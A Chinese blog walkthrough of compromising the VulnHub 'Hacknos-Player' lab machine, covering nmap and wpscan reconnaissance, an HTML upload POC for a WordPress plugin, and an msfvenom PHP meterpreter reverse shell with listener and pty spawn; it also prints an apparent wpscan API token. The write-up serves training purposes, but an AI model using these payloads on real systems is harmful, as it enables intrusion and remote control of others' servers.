Hacknos-Player V1.1靶机渗透测试

已于 2024-07-12 14:43:47 修改
阅读量217 收藏 10
点赞数 3
文章标签: mysql
于 2024-07-12 14:29:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58786230/article/details/140378479
版权

一、靶机下载地址

https://www.vulnhub.com/entry/hacknos-player-v11,459/

二、信息收集

1、主机发现

#使用命令
nmap 192.168.7.0/24 -sn | grep -B 2 '08:00:27:AD:A4:43'

2、端口扫描

#使用命令
nmap 192.168.7.34 -p- -sV

3、指纹识别

#使用命令
whatweb http://192.168.7.34

4、目录扫描

#使用命令
dirsearch -u "http://192.168.7.34"

三、获取webshell

1、访问靶机IP,发现网站路径为/var/www/html/g@web

2、拼接/g@web并访问,使用wappalyzer插件发现是用来wordpress CMS框架

3、使用wpscan工具枚举账户和密码,发现了一个链接

#使用命令
wpscan --url http://192.168.7.34/g@web -e u

4、访问链接发现hackNos@9012!!密码

5、对http://192.168.7.34/g@web进行目录扫描

6、拼接/g@web/wp-login.php并访问,发现登录框界面

7、尝试用枚举出来的密码进行登录,发现登录失败

8、使用wpscan对其网站进行漏洞扫描,发现远程代码执行漏洞,对其利用信息访问,拿取到POC并修改保存成HTML文件

#使用命令
wpscan --url http://192.168.7.34/g@web -e vp --api-token NCpd6sIerdVHZ48sTMJ4RIeawnhpImnOrjaxXiXgIX0

访问https://wpscan.com/vulnerability/85d3126a-34a3-4799-a94b-76d7b835db5f/,获取到POC:

#POC
<form method="post" enctype="multipart/form-data" action="https://192.168.7.34/g@web/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpsp_upload_attachment">
    Choose a file ending with .phtml:
    <input type="file" name="0">
    <input type="submit" value="Submit">
</form>

After doing this, an uploaded file can be accessed at, say:

http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml

将保存为POC.html文件:

#使用命令
touch POC.html
vim POC.html

9、使用MSF生成PHP木马并开启监听,使用浏览器打开POC.html的文件将生成的php shell行上传,并访问上传Shell页面,访问上传的Shell并接收到会话

#开启msf
msfconsole

#生成后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.7.108 LPORT=1234 x> shell.phtml

#开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST  192.168.7.108
set LPORT  1234
exploit

#shell上传页面
http://192.168.7.34/g@web/wp-content/uploads/wpsp/

#调用/bin/bash
python -c 'import pty; pty.spawn("/bin/bash")'

10、调用/bin/bash成功获取daoshell

#使用命令
shell
python -c 'import pty;pty.spawn("/bin/bash")'

果冻*果冻*
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4-Web渗透测试靶机
01-19
【DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
靶机系列测试 Os-hackNos-11
08-03
1.收集信息 3.对Drupal 7.57进行安全检测 5.解密文件 7.特权提升
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
web小项目-曼波生日录(Servlet+JSP+MySQL)
m0_75138009的博客
07-24 852
当记录条数过多时会自动出现滚轮,数据不会超出紫框。
Redis与MySQL数据一致性问题的策略模式及解决方案
qq_36451127的博客
07-24 2238
(1)实际开发中一般使用使用了缓存更新策略模式,此方案最大程度上保证了数据的一致性并且实现也最简单(2)无论是先操作数据库再删除缓存还是先删除缓存再操作数据库都有可能会出现删除缓存失败的情况,所以需要加入删除重试机制(3)如果想要Redis和Mysql的数据强一致性,可以考虑使用加锁的方式实现。
MySql 主从同步会不会影响到SQL执行速度?
weixin_44892327的博客
07-24 813
作用:负责将主库的二进制日志(binary log)数据传输到从库。工作方式:当从库连接到主库时,主库会为每个连接的从库开启一个 Binlog Dump 线程。这个线程从主库的二进制日志中读取日志记录,并将其发送给从库。Binlog Dump 线程:将二进制日志传输给从库。Binlog Dump GTID 线程(在启用 GTID 模式时):处理 GTID 相关的复制任务。
测试环境搭建整套大数据系统(十七:mysql同步,字段类型映射错误问题)
weixin_43446246的博客
07-24 428
mysql表hive表其中 type是字符串类型,但是yarn上一直报错number这个类是往int类型转才会使用到的。
MySQL中的CREATE EVENT 语句详解
u011565038的博客
07-24 573
CREATE EVENT语句在 MySQL 中用于创建一个事件调度器(Event Scheduler)的事件。事件调度器允许你安排数据库任务(如查询、数据更新等)在将来的某个时间点自动执行,或者根据特定的时间间隔重复执行。这对于需要定期执行的任务特别有用,比如数据清理、报表生成等。
sql注入 mysql 执行命令 sql注入以及解决的办法
QQ3007250950的博客
07-23 1005
所以后面的where条件是一个恒等式,表所有的行都符合字符串1等于字符串1这个条件,又是或的关系,所以所有的行全部匹配,全部被搜索出来,这样再用行数来判断用户是否能登陆已经根本不行了,因为查出来的是所有行。这句超级简单吧,我们都知道,这句最常用的是在登陆的时候,来查询用户输入的账号和密码匹配不匹配,来确定用户是否可以登陆的,大体上一看好像没啥问题,但是呢,假如我是一名黑客,我可以用一种巧妙地方式来登陆你这个系统,我账号随意输入一个,密码我输入一个 1 ‘or’ 1’='1 什么意思呢?
Mysql (五)
qq_64410777的博客
07-23 552
以左边的表为基础,接收左表的所有行,以左表的记录与右表的记录进行匹配,匹配左表的所有,以及右表中符合条件的行,不符合的显示null值。表和列的别名 在实际工作中,表和列名可能很长,写起来不方便,如果需要多次声明表和列时,全部展示太复杂,设置别名使书写简化。这里只是判断,结果为空 则不执行 ,如果不为空则执行前面的 结果是7 只要不为空就是7 执行的是count(*)SELECT i.name 姓名,i.score 成绩 from info as i;
[Mysql-DML数据操作语句]
2301_78794952的博客
07-23 1070
insert into student (sid,sname,birthday,ssex,classid) values(9,'张三','2007-1-1','男',1);insert into student(sname,ssex) values('某某1','男'),('某某2','女'),('某某3','男');insert into student values(9,'张三','2007-1-1','男',1);-- 将姓名为某某的生日改为1888-1-1。
Mysql - 索引
m0_69594200的博客
07-23 967
存储引擎、SQL优化工具、SQL优化,索引的分类、语法和使用规则等【笔记】内容
详解Mysql InnoDB引擎 04
程序员进阶之路
07-24 695
InnoDB 是MySQL数据库管理系统的一个存储引擎,它为MySQL提供了事务处理、外键约束和并发控制等关系型数据库管理系统(RDBMS)中重要的功能。以下是关于InnoDB存储引擎的一些关键特点和特性:
Mysql的索引
2401_84592402的博客
07-24 494
索引是一个排序的列表,在列表当中存储索引的值以及索引对应数据所在的物理行索引值和数据是一个映射关系。
mysqlbackup与xtrabackup的对比
cc20100608的专栏
07-24 324
MySQL数据库管理中,备份是确保数据安全性和可恢复性的重要环节。在众多备份工具中,mysqlbackup和xtrabackup是两款备受关注的工具。本文将围绕这两款工具进行详细对比,以探讨它们的优缺点,并试图给出在何种场景下更适合使用哪款工具。
MySQL:增删改查、临时表、授权相关示例
变成我......
07-24 864
Linux系统下MySQL服务的增删改查、临时表、授权相关实例,以及相关概念的讲解
centos7 mysql 基本测试(7)主从并行简单测试
最新发布
abc
07-25 402
centos7 mysql 基本测试(7)主从并行简单测试。
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值